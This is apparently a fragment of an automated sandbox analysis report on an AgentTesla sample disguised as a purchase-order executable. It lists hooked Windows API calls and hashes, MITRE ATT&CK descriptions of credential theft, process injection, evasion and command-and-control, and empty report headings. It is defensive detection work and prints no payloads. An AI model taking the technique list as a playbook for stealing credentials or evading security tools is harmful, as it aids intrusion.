Instruction Fuzzy Hash: D921F575D002099FCB54CFA9D844BEEBBF5BF88314F14842AE825A7350C774A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0167A2F8, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0167FD63

Memory Dump Source

Source File: 00000013.00000002.623923971.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 83c8285d857352f446fbeb0d8537b3149c91de0e201338b2f3b65374cc2d0825
Instruction ID: a6967b262960a93a9b6b292ad7eb1ffac64f53c9206d85935ad1b3fa1485aa70
Opcode Fuzzy Hash: 83c8285d857352f446fbeb0d8537b3149c91de0e201338b2f3b65374cc2d0825
Instruction Fuzzy Hash: CB2135719042099FCB50CFA9D948BEEBBF5FB88324F00842AE425A7340CB74A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01592F30, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01594216

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 38270be63ebf49e9b6bcf6cdd99a7909c23dff08f4620ce6802a3f8324d66bab
Instruction ID: 9bbc7411cd10aa6e75d33dd52fe299f7f38899eb646385064139e7ca9768166f
Opcode Fuzzy Hash: 38270be63ebf49e9b6bcf6cdd99a7909c23dff08f4620ce6802a3f8324d66bab
Instruction Fuzzy Hash: 1C2158B1C042898FDB10DFAAD444BDEBBF4FF49224F05885AC455A7200C338A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010D7AF8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010D8D89,00000800), ref: 010D8E1A

Memory Dump Source

Source File: 00000013.00000002.621906663.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1d4056df227cdb4908e2ee35241ba23c792c11bc0b16f5e38dfc3c448feb034a
Instruction ID: f289f7e95aba28028a3920d5e4d6761ff6545b327194d9dbff9cb7c7564f8d86
Opcode Fuzzy Hash: 1d4056df227cdb4908e2ee35241ba23c792c11bc0b16f5e38dfc3c448feb034a
Instruction Fuzzy Hash: 3E1114B29003499FDB10DF9AD848BDEFBF4EB98324F14842EE955A7200C374A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0167A2B4, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0167EC2A), ref: 0167ED17

Memory Dump Source

Source File: 00000013.00000002.623923971.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: db8b80209bb9004b7148d8cfa9ef6436f4771c4b3950ca2c2f5b6b7c194cabd5
Instruction ID: 9b5b4adea616949046c4f5726cee527f30d9e543143c2abd8aff01bfda9a510a
Opcode Fuzzy Hash: db8b80209bb9004b7148d8cfa9ef6436f4771c4b3950ca2c2f5b6b7c194cabd5
Instruction Fuzzy Hash: 891144B2C042199BCB00CF9AD844BDEFBF4FB48224F05816AE918B7240D378A955CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0159C3D8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0159C452

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 40ceb65f4cf649d69801dae200f81e9c11afe4a3d12729aa405a124480dc6ec2
Instruction ID: 418a92b0575ff461226ea14d0d0b55676b98405319d0c06060565c0be39510e4
Opcode Fuzzy Hash: 40ceb65f4cf649d69801dae200f81e9c11afe4a3d12729aa405a124480dc6ec2
Instruction Fuzzy Hash: 09119DB19003058FDF20DFAAD5087DEBBF4FB49314F20882AD40AAB200D7396444CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 010D8DA9, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010D8D89,00000800), ref: 010D8E1A

Memory Dump Source

Source File: 00000013.00000002.621906663.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8b9db5c801bd8d28c5511a3a5a7160bf814bc52cdf196ac23bcb2afd96cdc699
Instruction ID: dcf3c729359fd72ca60732f194cdd9e6e974499b6604dbcc8f9cafb942921132
Opcode Fuzzy Hash: 8b9db5c801bd8d28c5511a3a5a7160bf814bc52cdf196ac23bcb2afd96cdc699
Instruction Fuzzy Hash: A71114B2C003499FDB10CF9AD848BDEFBF4AB98324F14842ED955A7200C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0167ECA8, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0167EC2A), ref: 0167ED17

Memory Dump Source

Source File: 00000013.00000002.623923971.0000000001670000.00000040.00000001.sdmp, Offset: 01670000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 8fed7a68e6cbcf231302e5984287bb7cbf6339b3f97396548d7ebb24d375ebe8
Instruction ID: 1ac3eb7f53e5cb2cff28d414f80e026293956898711a142f1348532cbfdfd18e
Opcode Fuzzy Hash: 8fed7a68e6cbcf231302e5984287bb7cbf6339b3f97396548d7ebb24d375ebe8
Instruction Fuzzy Hash: 441114B2C006599BCB00CFAAD844BDEFBB4BF58224F15816AD914B7240D378A959CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015941AA, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01594216

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b361c6dc977c297264967da378d49cd931fb6550b39e1982351c4a6430794169
Instruction ID: d0655053493ed196086b2fc8288676e600a70a79dd8699b32c929ac7ca470d9b
Opcode Fuzzy Hash: b361c6dc977c297264967da378d49cd931fb6550b39e1982351c4a6430794169
Instruction Fuzzy Hash: 7A11F3B1C002498FDB10CFAAD544BDEFBF4FF89224F15855AD819A7600D379A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01592F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 01594216

Memory Dump Source

Source File: 00000013.00000002.623487224.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a63116fa3e0a11e22f36b98e375dddc01a4ea3f9a3bef8735be4c06fd5713478
Instruction ID: 4adb845e858e25fef07ee001e1ca55e0521c1e13a478ff069acc6837d428c07c
Opcode Fuzzy Hash: a63116fa3e0a11e22f36b98e375dddc01a4ea3f9a3bef8735be4c06fd5713478
Instruction Fuzzy Hash: 9311F3B1D002498BDB10DF9AD544BDEFBF4FB89224F15845AD929B7200D374A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 014ED450, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623052744.00000000014ED000.00000040.00000001.sdmp, Offset: 014ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ab1f4b2192aaf7630a665a51254346ea247be35e37e31a61d721b42b589501
Instruction ID: ee301a1db57ab94cabb76b6fad03792e28454780981fd35d05b45d6df99534b7
Opcode Fuzzy Hash: d5ab1f4b2192aaf7630a665a51254346ea247be35e37e31a61d721b42b589501
Instruction Fuzzy Hash: 492136B1904240EFDB05DF54D9C8F67BBA1FB94325F24857AE9054B226C336E846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014ED53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623052744.00000000014ED000.00000040.00000001.sdmp, Offset: 014ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15109311ff1d9103cc3248391a4a13556937a929b85a7e9839a0359c9ef284af
Instruction ID: ceee22e3f1bb079dae39ead16a5272e69d4a7657cbca3b13807b87cf39dd6e58
Opcode Fuzzy Hash: 15109311ff1d9103cc3248391a4a13556937a929b85a7e9839a0359c9ef284af
Instruction Fuzzy Hash: 5A2148B1904240DFCB05DF54D9C8B27BFA1FB84329F24896AE9094B216C336D456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623103518.00000000014FD000.00000040.00000001.sdmp, Offset: 014FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72da5f5401dd125dc9c4ed18c2ce54032171525a2bc4ba58ec3dbd2bbcafc9e8
Instruction ID: bc08a1ea8db84d311814e40ef926bcc1ab3ce882e00440b49f334f694478d136
Opcode Fuzzy Hash: 72da5f5401dd125dc9c4ed18c2ce54032171525a2bc4ba58ec3dbd2bbcafc9e8
Instruction Fuzzy Hash: F32125B1908240DFDB15CF54D8C4B26BB61FB84358F24C96EEA0A4B356C336D847CB61

Uniqueness

Uniqueness Score: -1.00%

Function 014FD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623103518.00000000014FD000.00000040.00000001.sdmp, Offset: 014FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6964e3e9716c5933d066dcd9e318f12caf64237d8ffaaa7a91de0c764c6fecb
Instruction ID: 6e830fedaa392e7bc4d4b8654dd4ebc81e281afe9ab315b91e617a5e2f0686a4
Opcode Fuzzy Hash: c6964e3e9716c5933d066dcd9e318f12caf64237d8ffaaa7a91de0c764c6fecb
Instruction Fuzzy Hash: 412180755093808FCB03CF24D590716BF71EB46214F28C5EBD9498B767C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 014ED44B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623052744.00000000014ED000.00000040.00000001.sdmp, Offset: 014ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction ID: 6bed1dcbfb108737aabdb09e0243c7e81db5153c59c32d30f8057b0c165ff0bf
Opcode Fuzzy Hash: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction Fuzzy Hash: 9F11B176804280CFDB16CF54D5C4B57BFB1FB84324F2886AAD8050B627C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 014ED537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.623052744.00000000014ED000.00000040.00000001.sdmp, Offset: 014ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction ID: cdc898eae7dcfc51d2c3dbb73d1489e5786549fce5fd3b26be5001ba2fa320c2
Opcode Fuzzy Hash: 7515d1e00a04a0e55848f7cd81b3790f4b61e24b1716d03f054666e0b267afed
Instruction Fuzzy Hash: DA11B176804280CFCB16CF54D5C4B16BFB2FB84324F2886AAD8094B626C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO #047428.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre